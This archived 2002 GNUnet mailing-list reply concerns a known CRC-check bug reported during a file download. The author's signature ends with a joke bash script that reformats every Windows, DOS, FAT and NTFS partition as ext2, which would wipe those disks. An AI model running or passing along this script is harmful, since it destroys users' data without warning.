gnunet-developers
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [GNUnet-developers] useless crap??


From: Christian Grothoff
Subject: Re: [GNUnet-developers] useless crap??
Date: Mon, 29 Apr 2002 16:55:20 -0500

Is known. The non-CVS version will actually die on the CRC error (there is 
some bug in the CRC check). It's my current top-priority bug, but I won't 
have time to work on it until after Wednesday...

Christian

On Monday 29 April 2002 03:50 pm, you wrote:
> Hello again.
>
> I was downloading a file from my local node that I inserted in the
> same node this weekend.
>
> In the output from gnunet-download:
>
> asking for 10900BF115F616CACA4951E4CD8D215447CF1779
> 85238 of 682230 downloaded (7740A687DCE7073D6B872BBE2D10F2AE223D3C9B)
> GBlock received reply for query 7740A687DCE7073D6B872BBE2D10F2AE223D3C9B
> This is an Inode at depth 1 and pos 678912
> CRC error. Collision in one of the blocks!
> You either hit the jackpot (51:2^160 chances) or a bug.
> Please report if you can reproduce this.
>  You may also want to check the integrity of your file...
>  . (212961688 != -1756923581)
> asking for 5E031772169E8908BE5D42DE05CDD5596088F603
> 86262 of 682230 downloaded (640EBECF7BB7B3C4DFD53F544804B4BABD64409A)
> GBlock received reply for query 640EBECF7BB7B3C4DFD53F544804B4BABD64409A
>
> The resulting file was an exact match for the orignal however.
>
> So here I am reporting it...
>
> -Wayne
>
> _______________________________________________
> GNUnet-developers mailing list
> address@hidden
> http://mail.gnu.org/mailman/listinfo/gnunet-developers

-- 
______________________________________________________
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"



reply via email to

[Prev in Thread] Current Thread [Next in Thread]